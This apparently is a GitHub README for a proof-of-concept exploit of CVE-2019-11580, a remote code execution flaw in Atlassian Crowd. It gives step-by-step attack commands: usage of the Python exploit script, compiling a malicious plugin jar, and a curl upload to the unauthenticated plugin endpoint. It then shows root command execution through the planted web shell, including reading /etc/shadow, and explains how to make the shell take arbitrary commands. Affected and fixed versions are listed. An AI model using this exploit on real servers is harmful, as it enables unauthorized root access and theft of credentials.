Home

Awesome

CVE-2019-11580

Atlassian Crowd and Crowd Data Center RCE

Usage:

python CVE-2019-11580.py http://xx.xx.xx.xx/

Crowd-2.11.0 Vuln_Version Donwload

https://product-downloads.atlassian.com/software/crowd/downloads/atlassian-crowd-2.11.0.tar.gz

Powered by Atlassian Crowd Version: 2.11.0 (Build:#725 - 2017-01-11)

http://10.10.20.166:8095/crowd/admin/uploadplugin.action

http://10.10.20.166:8095/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow

0x01 compile for rce.jar

javac -cp servlet-api.jar com/cdl/shell/exp.java

zip -r rce.jar atlassian-plugin.xml ./com

./compile.sh
updating: atlassian-plugin.xml (deflated 54%)
updating: com/ (stored 0%)
updating: com/cdl/ (stored 0%)
updating: com/cdl/shell/ (stored 0%)
updating: com/cdl/shell/exp.java (deflated 59%)
updating: com/cdl/shell/exp.class (deflated 45%)

0x02 upload rce.jar to crowd/admin/uploadplugin.action

curl -k -H "Content-Type: multipart/mixed" \
  --form "file_cdl=@rce.jar" http://10.10.20.166:8095/crowd/admin/uploadplugin.action
  
Installed plugin /opt/atlassian/crowd/apache-tomcat/temp/plugindev-1059463178748466378rce.jar

0x03 get shell

curl "http://10.10.20.166:8095/crowd/plugins/servlet/exp?cmd=whoami"
>>> root

curl "http://10.10.20.166:8095/crowd/plugins/servlet/exp?cmd=id"
>>> uid=0(root) gid=0(root) groups=0(root)

自定义cmd值:
https://github.com/lc/research/blob/master/CVE-2019-11580/atlassian-shell/com/cdl/shell/Cdl.java
思路参考: https://www.t00ls.net/articles-51978.html
原代码String cmd="whoami";
修改为String cmd=String.valueOf(req.getParameter("cmd"));

vuln version

Affected Versions

Fixed Version

2.1.0, 2.1.1, 2.1.2, 2.2.0, 2.2.1, 2.2.2, 2.2.3, 2.2.4, 2.2.5, 2.2.6, 2.2.7, 2.2.8, 2.2.9, 2.3.0, 2.3.1, 2.3.2, 2.3.3, 2.3.4, 2.3.5, 2.3.6, 2.3.7, 2.3.8, 2.3.9, 2.3.10, 2.4.0, 2.4.1, 2.4.2, 2.4.3, 2.4.4, 2.4.5, 2.4.6, 2.4.7, 2.4.8, 2.4.9, 2.4.10, 2.4.11, 2.5.0, 2.5.1, 2.5.2, 2.5.3, 2.5.4, 2.5.5, 2.5.6, 2.5.7, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.6.6, 2.6.7, 2.7.0, 2.7.1, 2.7.2, 2.8.0, 2.8.1, 2.8.2, 2.8.3, 2.8.4, 2.8.6, 2.8.7, 2.8.8, 2.9.1, 2.9.2, 2.9.3, 2.9.4, 2.9.5, 2.9.6, 2.9.7, 2.10.1, 2.10.2, 2.10.3, 2.10.4, 2.11.0, 2.11.1, 2.11.2, 2.12.0, 2.12.1, 3.0.0, 3.0.1, 3.0.2, 3.0.3, 3.0.4

3.0.5

3.1.0, 3.1.1, 3.1.2, 3.1.3, 3.1.4, 3.1.5

3.1.6

3.2.0, 3.2.1, 3.2.2, 3.2.3, 3.2.4, 3.2.5, 3.2.6, 3.2.7

3.2.8

3.3.0, 3.3.1, 3.3.2, 3.3.3, 3.3.4

3.3.5

3.4.0, 3.4.1, 3.4.2, 3.4.3

3.4.4

参考链接

https://www.t00ls.net/articles-51978.html
https://www.corben.io/atlassian-crowd-rce/
https://github.com/lc/research/tree/master/CVE-2019-11580/atlassian-shell